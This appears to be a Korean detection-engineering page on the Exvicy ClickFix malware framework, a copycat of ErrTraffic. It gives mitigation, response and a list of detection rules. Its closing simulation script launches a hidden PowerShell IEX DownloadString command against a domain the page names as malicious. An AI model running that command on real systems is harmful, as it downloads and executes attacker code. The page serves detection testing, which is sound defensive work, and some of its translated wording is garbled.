엑시비시: ErrTraffic 맬웨어 배포 프레임워크의 모방 사례
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
Exvicy는 사이버 범죄 포럼에서 홍보되는 신흥 Malware-as-a-Service (MaaS) ClickFix 배포 프레임워크입니다. Cloudflare Turnstile 도전을 모방하여 사회 공학을 사용하여 사용자에게 Windows 실행 대화 상자를 통해 악성 PowerShell 명령을 실행하도록 설득합니다. 이 프레임워크는 ErrTraffic을 밀접하게 복제하여 JavaScript 코드베이스와 난독화 기술의 많은 부분을 재사용합니다.
조사
TDR 분석가들은 Exploit.IN 포럼에 공유된 관리 패널의 스크린샷을 바탕으로 활성 C2 인프라를 발견했습니다. 특정 Cloudflare 네임서버와 도메인 등록 패턴을 분석함으로써, 연구자들은 여러 악성 도메인과 손상된 WordPress 웹사이트를 식별했습니다. 기술 분석은 JavaScript 기능과 반분석 로직을 포함한 ErrTraffic 코드의 광범위한 재사용을 확인했습니다.
완화
조직은 이 캠페인과 관련된 알려진 악성 도메인 및 의심스러운 TLD를 차단하기 위해 강력한 웹 필터링을 배포해야 합니다. 엔드포인트 보호는 특히 다음을 포함하는 명령어에서 이상적인 PowerShell 실행을 모니터링하고 제한해야 합니다 irm or iex. 또한 사용자는 다음과 같은 키보드 단축키 사용을 지시하는 사회 공학적 프롬프트를 인식하는 교육을 받아야 합니다 Win+R 명령을 실행하기 위해.
응답
Exvicy 활동이 감지되면, 추가 명령 실행 또는 페이로드 배달을 차단하기 위해 영향을 받은 호스트를 즉시 격리해야 합니다. 응답자는 실행된 명령어와 관련 네트워크 연결을 식별하기 위해 PowerShell 운영 로그를 검토해야 합니다. 알려진 C2 IP 주소와 도메인은 환경 내 다른 손상된 WordPress 자산을 검색한 후 경계에서 차단되어야 합니다.
공격 흐름
이 부분은 아직 업데이트 중입니다.
탐지
비정상적 최상위 도메인 (TLD) DNS 요청에 의한 수상한 명령 및 제어 (dns를 통해)
LOLBin 의미론과 함께 비정상적인 RunMRU 항목 (registry_event를 통해)
IOCs (SourceIP) 탐지: Exvicy: ErrTraffic 멀웨어 배포 프레임워크의 모방자
IOCs (DestinationIP) 탐지: Exvicy: ErrTraffic 멀웨어 배포 프레임워크의 모방자
Exvicy 멀웨어를 위한 악성 PowerShell 명령 실행 탐지 [Windows Powershell]
Exvicy 프레임워크 명령 실행을 위한 Win + R 단축키 사용 [Windows 프로세스 생성]
시뮬레이션 실행
-
공격 서사 & 명령어: 공격자는 피싱을 통해 악성 단축키 또는 문서를 사용자에게 전달합니다. 실행(T1204.002) 시, 사용자는 알지 못한 채 PowerShell 프로세스를 트리거(T1059.001)합니다. 공격자의 목표는 2차 페이로드를 다운로드하여 발판을 마련하는 것입니다. Exvicy 프레임워크를 모방하기 위해 명령 줄에는 특정 알려진 악성 도메인
recaptcha-check.com/8E9curHNH8UfAMLz을 포함하여 악성 에이전트를 끌어내립니다. -
회귀 테스트 스크립트:
# Exvicy 탐지 규칙을 트리거하기 위한 시뮬레이션 스크립트. # Sigma 규칙에서 식별된 명령 줄 패턴을 모방합니다. $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz" $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`"" Write-Host "[+] 시뮬레이션 시작: 탐지를 트리거하기 위해 명령 실행 중..." Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`"" Write-Host "[+] 시뮬레이션 명령 전송 완료. SIEM에서 경고를 확인하십시오." -
클린업 명령어:
# 정리: 이 특정 시뮬레이션은 영구 파일을 생성하지 않지만, # 실행 중인 PowerShell 프로세스가 남아있지 않도록 합니다. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue Write-Host "[+] 정리가 완료되었습니다."